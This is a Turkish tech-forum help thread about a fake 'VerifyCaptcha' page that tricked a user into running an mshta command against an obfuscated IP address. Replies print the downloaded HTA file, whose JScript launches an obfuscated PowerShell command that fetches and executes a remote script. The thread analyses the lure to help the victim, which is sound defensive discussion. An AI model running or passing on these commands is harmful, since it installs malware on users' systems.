Çözüldü Sahte VerifyCaptcha tarafından virüs gelmiş olabilir mi?

  • Konuyu başlatan akiff0
  • Başlangıç Tarihi
  • Mesaj 24
  • Görüntüleme 400
Bu konu çözüldü olarak işaretlenmiştir. Çözülmediğini düşünüyorsanız konuyu rapor edebilirsiniz.
Çözüm
Lusadris
Çok yüksek ihtimalle zararlı hocam. Powershell scripti çalıştırıyor.
Tarihe göre sırala Puana göre sırala
IP adresinin orta kısmını byte'a çevirmiş.

Bu bir link ve sahte bir dicom dosyası indiriyor.

mashta.exe ile indirdiği dosyayı direkt sistemde çalıştırıyor.

Virüse benziyor.
 
Artı 0 Eksi
akiff0 dedi:
Windows + r yaptırıp mshta http://162.0xfc.0xc6.122/nw/exnw.dcm bunu yazdırdı nedir bu? CMD açıldı bilgi sızdırmış olabilir mi IP'ye benziyor.
Genişletmek için tıkla...

Direk dosya indiriyor hocam:

1760622761785.png


VirusTotal taraması yaptım:VirusTotal

Bash: 
<html>
<head>
 <script language="JScript">
 window.onload = function () {
 var shell = new ActiveXObject("WScript.Shell");

 var cmd = 'POwERShelL -"W" h -"CoMMaN"d "i"ex" (irm "h"tt"ps://f"er"ri"ou"njk"b.o"ne/hy"r"t".ob"b)"';

 shell.Exec(cmd);

 window.close();
 };
 </script>
</head>
<body>
</body>
</html>

İççindeyse bu kodlar var. Ne yaptığını çözemedim.
 
Artı 0 Eksi

VirusTotal

VirusTotal
www.virustotal.com www.virustotal.com
temiz diyor ama güvenemedim sanırım şifreli dosyayı tarıyor.
 
Artı 0 Eksi

Benzer konular

C
Telefona virüs gelmiş olabilir mi?
2
Mesaj
13
Görüntüleme
539
717525
7
Xed
  • Soru
Discord virüsü gelmiş olabilir mi?
2
Mesaj
16
Görüntüleme
1.390
462465
4
fatihkahraman126
Sahte Turkcell mailinden virüs yemiş olabilir miyim?
2
Mesaj
15
Görüntüleme
10.127
fatihkahraman126
fatihkahraman126
Longhorn
Sahte Firefox Olabilir Mi?
2
Mesaj
11
Görüntüleme
1.372
Yamete Kudasai
Yamete Kudasai
teemoplayer
İndirilen sürücü virüslü veya sahte olabilir mi?
Mesaj
3
Görüntüleme
229
teemoplayer
teemoplayer

Technopat Haberler

Yeni konular

Yeni mesajlar

Geri
Yukarı